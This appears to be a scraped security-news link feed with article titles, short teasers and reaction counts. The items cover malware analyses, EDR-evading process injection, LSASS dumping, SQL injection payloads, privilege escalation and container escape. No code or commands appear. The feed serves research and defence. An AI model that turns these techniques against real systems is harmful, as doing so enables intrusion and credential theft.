23 Open Problems for Digital Self-Replicators https://tmpout.sh/3/21.html
DanaBot's Latest Move: Deploying Latrodectus https://www.esentire.com/blog/danabots-latest-move-deploying-icedid
eSentire
DanaBot's Latest Move: Deploying Latrodectus
Learn more about DanaBot banking Trojan and get security recommendations from our Threat Response Unit (TRU) to protect your business from this cyber…
👍1
Information about Windows persistence mechanisms https://persistence-info.github.io/
👌2
Ghidra Basics - Manual Shellcode Analysis and C2 Extraction https://embee-research.ghost.io/ghidra-basics-shellcode-analysis/
Embee Research
How to Use Ghidra to Analyse Shellcode and Extract Cobalt Strike Command & Control Servers
Manual analysis of Cobalt Strike Shellcode with Ghidra. Identifying function calls and resolving API hashing.
Leveraging ssh-keygen for Arbitrary Execution (and Privilege Escalation) https://seanpesce.blogspot.com/2023/03/leveraging-ssh-keygen-for-arbitrary.html
Blogspot
Leveraging ssh-keygen for Arbitrary Execution (and Privilege Escalation)
TL;DR The ssh-keygen command can be used to load a shared library with the -D flag. This can be useful for privilege ...
Cramming a Tiny Program into a Tiny ELF File: A Case Study https://tmpout.sh/3/22.html
The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools https://www.safebreach.com/blog/process-injection-using-windows-thread-pools
SafeBreach
Process Injection Using Windows Thread Pools | Safebreach
Researchers have developed 8 new undetectable process injection techniques exploiting Windows thread pools to bypass leading EDR solutions.
👍2
PoolParty: A set of fully-undetectable process injection techniques abusing Windows Thread Pools https://github.com/SafeBreach-Labs/PoolParty
GitHub
GitHub - SafeBreach-Labs/PoolParty: A set of fully-undetectable process injection techniques abusing Windows Thread Pools
A set of fully-undetectable process injection techniques abusing Windows Thread Pools - SafeBreach-Labs/PoolParty
POSTDump: perform minidump of LSASS process using few technics to avoid detection https://securityonline.info/postdump-perform-minidump-of-lsass-process-using-few-technics-to-avoid-detection/
New payload to exploit Error-based SQL injection - Oracle database https://www.mannulinux.org/2023/12/New-payload-to-exploit-Error-based-SQL-injection-Oracle-database.html
www.mannulinux.org
New payload to exploit Error-based SQL injection - Oracle database
Learn Basic Concepts of Linux. Best site to learn Linux from beginner to Advanced.
Rhysida Ransomware: History, TTPs and Adversary Emulation Plans https://fourcore.io/blogs/rhysida-ransomware-history-ttp-adversary-emulation
FourCore
Rhysida Ransomware: History, TTPs and Adversary Emulation Plans
Rhysida is a new player in the Ransomware space, first appearing in May 2023, and has been targeting industries all across the globe. In recent months, Rhysida has run campaigns compromising and extorting organizations from the government, education, healthcare…
JMP slide: A NOP-sled alternative https://tin-z.github.io/intel/assembly/exploit/2023/12/12/jmp_slide.html
Lambda driver blog
JMP slide: A NOP-sled alternative
In the following blog post, I will introduce you to two techniques similar to NOP-sled or NOP slide, but with the advantage that they are faster. Those techniques are: JMP slide and JCC slide.
Racing against the clock -- hitting a tiny kernel race window https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html
projectzero.google
Racing against the clock -- hitting a tiny kernel race window - Project Zero
TL;DR: How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:use a cache miss to widen the race window a little bit...
👍2
A new method for container escape using file-based DirtyCred https://starlabs.sg/blog/2023/07-a-new-method-for-container-escape-using-file-based-dirtycred/
STAR Labs
A new method for container escape using file-based DirtyCred
Recently, I was trying out various exploitation techniques against a Linux kernel vulnerability, CVE-2022-3910. After successfully writing an exploit which made use of DirtyCred to gain local privilege escalation, my mentor Billy asked me if it was possible…
Silverpeas App: Multiple CVEs leading to File Read on Server https://rhinosecuritylabs.com/research/silverpeas-file-read-cves/
Rhino Security Labs
Silverpeas App: Multiple CVEs leading to File Read on Server
Rhino Security Labs identified 8 new CVEs in the Silverpeas Core application.
UTG-Q-003: Supply Chain Poisoning of 7ZIP on the Microsoft App Store https://ti.qianxin.com/blog/articles/UTG-Q-003-Supply-Chain-Poisoning-of-7ZIP-on-the-Microsoft-App-Store-EN/
Qianxin
奇安信威胁情报中心
Nuxt.js project
Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
Cisco Talos Blog
Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group.
Tips For Analyzing Delphi Binaries in IDA (Danabot) https://www.youtube.com/watch?v=04RsqP_P9Ss
YouTube
Tips For Analyzing Delphi Binaries in IDA (Danabot)
Reverse Engineering Delphi is a nightmare ... or it can be if you don't have the right setup! In this clip we cover some easy tips that can help make some of the analysis a bit easier.
Full notes with links for tools are available here:
https://research…
Full notes with links for tools are available here:
https://research…
👏3
Cloudflare 2023 Year in Review https://blog.cloudflare.com/radar-2023-year-in-review/
The Cloudflare Blog
Cloudflare 2023 Year in Review
The 2023 Cloudflare Radar Year in Review is our fourth annual review of Internet trends and patterns observed throughout the year at both a global and country/region level across a variety of traffic, connectivity, and speed metrics, based on data from Cloudflare’s…
👍2
New Critical RCE Vulnerability Discovered in Apache Struts 2 - Patch Now https://thehackernews.com/2023/12/new-critical-rce-vulnerability.html